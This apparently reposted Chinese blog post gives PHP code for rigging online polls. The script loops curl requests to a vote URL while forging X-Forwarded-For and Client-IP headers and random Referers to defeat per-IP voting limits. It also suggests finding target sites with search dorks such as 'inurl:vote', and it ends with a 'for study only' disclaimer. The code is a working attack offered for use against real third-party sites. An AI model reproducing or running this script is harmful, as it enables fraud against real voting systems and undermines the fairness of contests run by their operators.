码迷,mamicode.com
首页 > 其他好文 > 详细

网上投票系统刷票代码

时间:2014-10-16 12:26:12      阅读:163      评论:0      收藏:0      [点我收藏+]

标签:投票系统漏洞   投票系统   

很多网站上的投票依据是ip地址,不同的ip地址一天可投票一次

下面的代码就是利用curl扩展来伪造ip地址 达到无限制投票;

$times = $_POST['times'];  //投票次数
			$url = $_POST['url'];   //投票地址[某个选手下方投票按钮的链接]
			while ($times) 
			{
				$ip1 = 'X-FORWARDED-FOR:'.rand(115,225).'.'.rand(115,225).'.'.rand(115,225).'.'.rand(115,225);
				$ip2 = 'CLIENT-IP:'.rand(115,225).'.'.rand(115,225).'.'.rand(115,225).'.'.rand(115,225);
				$arr = array('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z');
				$from = "http://www.".$arr[rand(0,25)].".com/";
				$ch = curl_init(); 
				curl_setopt($ch, CURLOPT_URL, $url); 
				curl_setopt($ch, CURLOPT_HTTPHEADER, array($ip1, $ip2)); 
				curl_setopt($ch, CURLOPT_REFERER, $from); 
				curl_setopt($ch, CURLOPT_HEADER, 1); 
				curl_exec($ch); 
				curl_close($ch);
				$times--;
			}
			return ;


注意:大部分系统都是可以的,主要是他在检测ip地址的时候并没有检查到真实的地址,但是有些程序员的代码写的比较谨慎的,这种就不行了,

如果你想测试一下这个代码但是又找不到投票系统怎么办,在百度或者谷歌搜索栏中输入 inurl:vote  或者inurl:toupiao  会找到很多,

本文只作学习交流,使用一切后果与本人无关

网上投票系统刷票代码

标签:投票系统漏洞   投票系统   

原文地址:http://blog.csdn.net/jiecooner/article/details/40143253

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!